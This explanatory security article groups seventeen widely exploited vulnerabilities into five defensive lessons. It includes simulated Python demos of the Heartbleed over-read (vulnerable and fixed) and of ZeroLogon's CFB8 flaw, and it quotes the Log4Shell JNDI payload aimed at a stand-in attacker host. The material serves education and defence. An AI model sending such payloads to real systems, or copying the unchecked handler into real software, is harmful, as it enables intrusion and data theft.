One Patch. Two Months. $10 Billion in Damages.
On May 12, 2017, a piece of ransomware called WannaCry began spreading across the internet. In the first 24 hours, it infected more than 200,000 computers in 150 countries. It shut down hospital emergency departments across the UK's National Health Service, forcing ambulance diversions. It halted car factories. It encrypted machines at telecoms, banks, universities, and government agencies worldwide. A security researcher accidentally stopped it by registering a $10 domain name that served as a kill switch — WannaCry checked whether that domain resolved before executing, and registering it flipped the off switch globally.
Six weeks later, a second, more destructive outbreak hit. NotPetya spread across Ukraine and then the world, destroying rather than encrypting. It cost shipping giant Maersk over $300 million, wiped out pharmaceutical manufacturer Merck's entire manufacturing capability for weeks, and caused an estimated $10 billion in total damages — the most destructive cyberattack in history at the time.
Both outbreaks used the same vulnerability: CVE-2017-0144, a buffer overflow in Windows SMBv1 — a file-sharing protocol from the 1980s that Microsoft had been trying to retire for years. Microsoft had patched it in March 2017. WannaCry struck in May. NotPetya in June. Every machine they destroyed was running an obsolete service its owner had never thought about, and had never received a patch that had been available for months.
This is the story of modern cybersecurity vulnerabilities. Not once, but seventeen times.
Why These Seventeen
The vulnerabilities in this article all appear in CISA's Known Exploited Vulnerabilities catalog — the U.S. government's list of security flaws confirmed to have been exploited against real organizations. They span 2014 to 2024. They cover every major platform: Windows, Linux, Java, network appliances, and web applications. They have common names — Shellshock, Heartbleed, EternalBlue, Log4Shell, ZeroLogon, PrintNightmare, CitrixBleed, MOVEit — because they were significant enough that the security community gave them identities.
What unites them isn't the technical details. It's the pattern. Five patterns, specifically. Learn them and you will recognize the next generation of major vulnerabilities before the news gives them names.
Pattern One: The Service Nobody Thought About
The first pattern is the oldest: a service that was installed by default, never needed, never disabled, and never updated. It sits quietly on the network until someone figures out it's attackable — and then it's everywhere.
EternalBlue (CVE-2017-0144) targeted SMBv1 — a file-sharing protocol that Microsoft had deprecated in 2014 but left enabled by default on all Windows versions. Hundreds of millions of machines had port 445 open and responsive, speaking a protocol nobody was using for legitimate purposes, patched by almost no one. WannaCry didn't need to find a clever attack; it just needed a list of machines with port 445 open. The internet provided that list freely.
PrintNightmare (CVE-2021-34527) targeted the Windows Print Spooler — a service that runs as NT AUTHORITY\SYSTEM, the highest privilege level on Windows, and is enabled by default on all Windows machines including domain controllers. Domain controllers are the crown jewels of a Windows environment: compromise one and you own every user, every machine, every server in the organization. Almost no domain controllers have a legitimate need to run a print service. But the Print Spooler ran on them anyway, by default, until an accidental PoC publication in June 2021 turned it into a reliable domain takeover path for any authenticated user.
BlueKeep (CVE-2019-0708) targeted Remote Desktop Protocol — Windows' built-in remote access service — on Windows 7 and Server 2008. Millions of organizations had RDP exposed directly to the internet, either as a convenience for remote administration or as a forgotten port that had never been closed. The NSA, UK NCSC, and CISA issued coordinated warnings about its wormability. Five intelligence agencies warning about a single vulnerability is not a routine event.
Shellshock (CVE-2014-6271) targeted Bash — the default command shell on virtually every Linux and Unix system. The vulnerability was in how Bash parsed environment variables, a behavior so deeply embedded in the shell that it had been there for 25 years undetected. Web servers that ran CGI scripts passed user-supplied HTTP headers as environment variables to Bash. Mail servers did the same. DHCP clients did the same. Any service that touched Bash and accepted external input was potentially exploitable.
The lesson: every service you don't need is a service someone can attack. Disabling what you don't use is not optional cleanup — it's the first line of defense.
Pattern Two: The Dependency You Didn't Write
The second pattern is subtler and more modern: a vulnerability not in code you wrote, but in a library or framework embedded inside your application. You didn't install it intentionally. You installed something else, and it came along for the ride.
Log4Shell (CVE-2021-44228) is the most striking example. Apache Log4j2 is a Java logging library — a utility used to record application events for debugging and monitoring. When Log4j2 logged a string containing ${jndi:ldap://attacker.com/x}, it treated the string as an instruction, reached out to an attacker's server, and executed whatever code it retrieved. The vulnerability was in the logging infrastructure, which meant that any Java application that used Log4j2 for logging — and hundreds of millions did — was potentially vulnerable through any input it logged: a username, a search query, a User-Agent header.
Within 24 hours of disclosure in December 2021, security firms were observing millions of exploitation attempts. The affected software included Apple iCloud infrastructure, Amazon AWS services, Cisco products, VMware, Minecraft servers, and thousands of enterprise applications. Many organizations had no idea Log4j2 was even present in their environment, because it was a transitive dependency — a library pulled in by a library pulled in by an application, never explicitly installed, invisible to standard software inventories.
Heartbleed (CVE-2014-0160) worked the same way through OpenSSL — the cryptographic library underpinning HTTPS for most of the internet. A missing bounds check in the TLS heartbeat extension allowed any remote attacker to read 64 kilobytes of server memory per request, repeatedly, with no authentication and no server-side logs. At the time of disclosure, approximately 17% of all HTTPS servers were vulnerable. Private keys, session tokens, and passwords were extractable — and nobody who had already exploited it left any traces.
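The missing bounds check, reduced to its shape: this is an added example, not OpenSSL's code or the article's, and it simulates process memory with a byte string instead of a C buffer (the real fix also accounts for 16 bytes of padding, which is left out here). The same over-read class is what CitrixBleed, covered below, turned into session-token theft.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2

def build_heartbeat(payload: bytes, declared_len: Optional[int] = None) -> bytes:
    """Encode a heartbeat body: type byte, 16-bit payload length, payload.
    declared_len lets a test claim a length the payload does not have."""
    n = len(payload) if declared_len is None else declared_len
    return struct.pack("!BH", HEARTBEAT_REQUEST, n) + payload

def vulnerable_respond(memory: bytes, record_len: int) -> bytes:
    """Pre-fix shape of the bug: copy 'declared' bytes without asking whether
    the record is that long, so the copy runs into adjacent memory."""
    hb_type, declared = struct.unpack("!BH", memory[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return b""
    return struct.pack("!BH", HEARTBEAT_RESPONSE, declared) + memory[3:3 + declared]

def hardened_respond(memory: bytes, record_len: int) -> Optional[bytes]:
    """Fixed shape: the declared payload must fit inside the received record."""
    if record_len < 3:
        return None                       # not even a full header
    hb_type, declared = struct.unpack("!BH", memory[:3])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if 3 + declared > record_len:         # the check that was missing
        return None                       # drop the record, send nothing
    return struct.pack("!BH", HEARTBEAT_RESPONSE, declared) + memory[3:3 + declared]

def demo():
    """Constructed scenario: a 2-byte payload claiming 40 bytes, sitting in
    a buffer right before a constructed secret."""
    secret = b"-----BEGIN PRIVATE KEY----- (constructed)"
    record = build_heartbeat(b"hi", declared_len=40)
    memory = record + secret
    leaked = vulnerable_respond(memory, len(record))
    dropped = hardened_respond(memory, len(record))
    return leaked, dropped

if __name__ == "__main__":
    leaked, dropped = demo()
    print("vulnerable reply carried:", leaked[3:])
    print("hardened reply:", dropped)
```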
Apache ActiveMQ (CVE-2023-46604) followed the same script in 2023. ActiveMQ is a message broker — infrastructure middleware that routes messages between application components. A deserialization flaw in its OpenWire protocol allowed a single crafted network packet to execute arbitrary code on the broker. Exploitation began within 24 hours of disclosure; HelloKitty ransomware was deploying payloads within days.
The lesson: your attack surface includes everything in your software supply chain. An accurate inventory of what's running — including transitive dependencies — is prerequisite to knowing what to patch.
Pattern Three: The Perimeter Device Trap
Security teams spend considerable effort protecting the servers and workstations inside the network. The devices they put in front of everything to provide that protection — firewalls, VPN concentrators, load balancers, application delivery controllers — receive less scrutiny and are updated less frequently. They are also, from an attacker's perspective, the ideal target: compromise the device that terminates all encrypted traffic and you see everything.
CitrixBleed (CVE-2023-4966) is the most instructive example. Citrix NetScaler Gateway is the VPN appliance that employees use to access internal resources remotely. A buffer over-read leaked active session tokens from the appliance's memory. An attacker with a leaked session token could impersonate a fully-authenticated VPN session — bypassing multi-factor authentication entirely, because MFA had already been satisfied for that session. LockBit ransomware used this to breach Boeing, disrupt DP World Australia's port operations nationally, compromise ICBC's New York trading desk, and hit dozens of other major organizations in late 2023.
Palo Alto Networks PAN-OS (CVE-2024-3400) received a perfect CVSS score of 10.0 in April 2024. A chain of two bugs in the GlobalProtect VPN feature — an arbitrary file creation flaw and a cron job that processed those files — allowed unauthenticated root command execution on the firewall itself. Chinese state-sponsored group UTA0218 deployed a custom Python backdoor named UPSTYLE and used compromised firewalls to harvest VPN credentials and pivot into victim networks. The CISA remediation deadline was 7 days — one of the shortest ever set.
F5 BIG-IP (CVE-2022-1388) and Citrix ADC (CVE-2019-19781) follow the same arc. F5 BIG-IP appliances sit in front of application servers handling load balancing and SSL termination; a single crafted HTTP request bypassed authentication to the management API and gave root on the appliance. Citrix ADC — the device thousands of organizations use as their internet-facing VPN gateway — spent six weeks in early 2020 with a publicly-known vulnerability and no patch, while approximately 80,000 internet-exposed instances were actively exploited by ransomware operators, cryptomining botnets, and nation-state groups simultaneously.
The lesson: the device you trust to protect your network is itself a high-value target. Perimeter devices need the same patching urgency as the servers they protect — often more, because they are directly internet-accessible and run as privileged infrastructure.
Pattern Four: Authentication Is Not What You Think
A common mental model of authentication: the attacker doesn't have a password, so they can't get in. Three of these vulnerabilities break that assumption in ways that have nothing to do with guessing or stealing passwords.
ZeroLogon (CVE-2020-1472) exploited a flaw in the cryptographic protocol Windows domain controllers use to authenticate other computers on the network. The authentication protocol used AES-CFB8 encryption with an all-zero initialization vector. Due to a statistical property of this cipher configuration, there is a 1-in-256 chance that encrypting all-zero bytes produces all-zero output. By sending about 256 authentication attempts composed entirely of zeros, an attacker could authenticate as any domain computer — including the domain controller itself — without knowing any password. The entire exploit takes seconds. Microsoft rated it CVSS 10.0. An attacker who lands on any machine with network access to a domain controller can take over the entire Active Directory domain in seconds, silently, without credentials.
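Why the 1-in-256 figure is a property of the cipher mode rather than of any particular key: this added example (not from the article or from Microsoft's Netlogon code) implements CFB8 generically and drives it with a constructed keyed-hash stand-in for AES, because the argument only depends on the first keystream byte. With an all-zero IV and all-zero plaintext, the shift register never changes once the first ciphertext byte is zero, so the whole output is zero exactly when E_k(0^16)[0] == 0.

```python
import hashlib

BLOCK = 16

def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Constructed 16-byte block function (NOT AES): keyed SHA-256 truncated
    to one block. Only the structure of the CFB8 mode matters here."""
    return hashlib.sha256(key + block).digest()[:BLOCK]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes,
                 block_encrypt=toy_block_encrypt) -> bytes:
    """CFB8: each ciphertext byte is the plaintext byte XOR the first byte of
    E_k(register); the register then drops its oldest byte and appends the
    new ciphertext byte."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)

def zero_iv_zero_plaintext_is_all_zero(key: bytes, n: int = 8) -> bool:
    """Does an all-zero IV plus all-zero plaintext encrypt to all zeros?"""
    return cfb8_encrypt(key, bytes(BLOCK), bytes(n)) == bytes(n)

def first_keystream_byte_is_zero(key: bytes) -> bool:
    """The single condition that decides it: E_k(0^16)[0] == 0."""
    return toy_block_encrypt(key, bytes(BLOCK))[0] == 0

def count_zero_keys(num_keys: int = 4096) -> int:
    """Count deterministically derived (constructed) keys for which the
    all-zero ciphertext appears; expect roughly num_keys / 256."""
    return sum(zero_iv_zero_plaintext_is_all_zero(k.to_bytes(BLOCK, "big"))
               for k in range(num_keys))

if __name__ == "__main__":
    hits = count_zero_keys()
    print(f"{hits} of 4096 keys give an all-zero ciphertext (expected about 16)")
```

A random IV, as the mode is meant to be used, breaks the argument at the first byte, which is why the fix is in the protocol's use of the mode rather than in AES itself.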
ProxyLogon (CVE-2021-26855) bypassed Exchange Server's authentication through Server-Side Request Forgery — tricking the Exchange front-end proxy into forwarding requests to the back-end as if they came from the Exchange server itself. The back-end trusted internal requests implicitly. No password was needed; the SSRF manufactured the appearance of internal trust. Chinese state-sponsored group HAFNIUM was exploiting this as a zero-day before the patch existed, planting webshells in tens of thousands of Exchange servers that persisted even after patching.
CitrixBleed, covered above, broke authentication differently: not by bypassing the login process, but by stealing the proof-of-login after MFA had already been completed. The attacker never needed to defeat the authentication system — they waited until a legitimate user had already done it, then took the resulting token.
The lesson: authentication systems can be defeated without touching a password. Cryptographic flaws, trust relationships, session management, and protocol design are all attack surfaces. MFA stops credential stuffing; it does not stop session token theft or SSRF-based authentication bypass.
Pattern Five: The Clock Always Favors the Attacker
The final pattern is about time — specifically, the asymmetry between how fast attackers move and how fast defenders patch.
MOVEit (CVE-2023-34362) demonstrated this at scale. The Cl0p ransomware group exploited MOVEit Transfer's SQL injection vulnerability over the 2023 Memorial Day weekend — a holiday period specifically chosen to maximize the time before defenders noticed. By the time Progress Software was notified on May 31, Cl0p had already silently exfiltrated data from hundreds of organizations. The final tally: over 2,500 organizations breached, an estimated 66–100 million individuals' data exposed, including U.S. government agencies, universities, hospitals, and global corporations. Cl0p's approach was pure extortion — no ransomware encryption, just data theft and the threat of publication. The SQL injection vulnerability was straightforward; the sophistication was entirely operational.
Atlassian Confluence's OGNL injection (CVE-2022-26134) was being exploited as a zero-day before the patch existed. When Atlassian published the advisory, CISA set a 4-day remediation deadline — and exploitation was measured in hours from the moment of disclosure. The Citrix ADC vulnerability from 2019 sat unpatched for six weeks while 80,000 internet-exposed devices were systematically compromised.
EternalBlue had a patch available for two months before WannaCry. Every organization that patched in those two months was fine. Every organization that didn't lost data, systems, and in some cases lives — NHS emergency diversions during WannaCry had real patient safety consequences.
The lesson is uncomfortable: the gap between "patch available" and "mass exploitation" is measured in days, not months. Every day of delay is a day attackers have that defenders don't.
What This Means in Practice
Seventeen vulnerabilities, five patterns. They imply three things worth doing regardless of whether you're a system administrator, a developer, or someone who just wants to understand how attacks work.
Reduce attack surface. Every service you don't need is a service someone can attack. SMBv1 didn't need to be running. The Print Spooler didn't need to be on domain controllers. RDP didn't need to be internet-facing. Disabling unused services, protocols, and features is not a nice-to-have; it's the cheapest and most durable security control available.
Inventory your dependencies. Log4Shell spread so widely because most organizations didn't know they had it. A software bill of materials — a list of every library, framework, and component in your software stack — is the prerequisite for knowing what to patch. Without it, you can't respond to the next Log4Shell until a vendor tells you you're exposed.
Patch fast. The speed asymmetry is real and structural. Attackers reverse-engineer patches within hours of release to reconstruct the original vulnerability. The two-month WannaCry gap was unusual; MOVEit had no gap at all — Cl0p exploited before the patch existed. For critical, internet-facing systems, patch windows measured in weeks are no longer compatible with the threat environment. The organizations that patched EternalBlue in March 2017 had no problem in May; the ones that didn't became WannaCry victims. Those are the only two groups.
None of these lessons are new. Shellshock was discovered in 2014. The advice — reduce attack surface, know your dependencies, patch fast — has been consistent for a decade. The seventeen vulnerabilities in this article are evidence of what happens when that advice isn't followed, repeated across every platform, every industry, and every year.
The next named vulnerability is already being exploited somewhere. The question is whether it will be new advice or the same advice, applied too late again.
CVEs Covered
References
| Resource | Type |
|---|---|
| CISA Known Exploited Vulnerabilities Catalog | US Government |
| National Vulnerability Database | Vulnerability Database |